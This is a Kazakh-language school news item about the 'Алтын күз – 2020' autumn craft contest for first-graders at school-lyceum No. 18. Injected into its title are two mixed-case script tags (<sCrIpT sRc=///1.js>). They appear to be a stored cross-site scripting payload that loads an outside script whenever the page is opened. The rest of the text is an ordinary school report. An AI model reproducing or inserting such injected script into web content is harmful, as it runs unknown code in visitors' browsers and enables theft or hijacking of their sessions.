«Алтын күз – 2020»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

23.10.2020

         Күз-жыл мезгілдерінің ішіндегі ең керемет және ғажайып мезгілдердің бірі.Сонымен қатар еңбекке және ұйымшылдыққа баулитын уақыт.

         Осыған байланысты Алтын күздің қақ ортасы қазан айының он тоғызыншы жұлдызында Сәкен Жүнісов  атындағы №18 орта мектеп-лицейінің 1  «Б» сыныбында «Алтын күз – 2020» қолөнер байқауы өтті.

         Байқаудың басты мақсаты шығармашылыққа бейім балаларға қолдау көрсетіп, ынталандыру болатын.

       Оқушылар білімділігімен қоса әр түрлі заттардан,күзгі жеміс-жидектерден, түрлі астық дәнді-дақылдарынан, балғын бақша жемістерінен көптеген бұйымдар дайындады. Осы жұмыстардың арқасында оқушылардың жеті қырлы,бір сырлы екендігін бірден байқауға болады. Барлық балалардың жұмыстары бағаланып, жүлделі орындарға лайық деп танылды.                                                           

                                                              1 «Б» сынып жетекшісі:Ташикова Т.Н.

Просмотров: 727


Пікір қосу



Деректерді қолтаңбаға қосу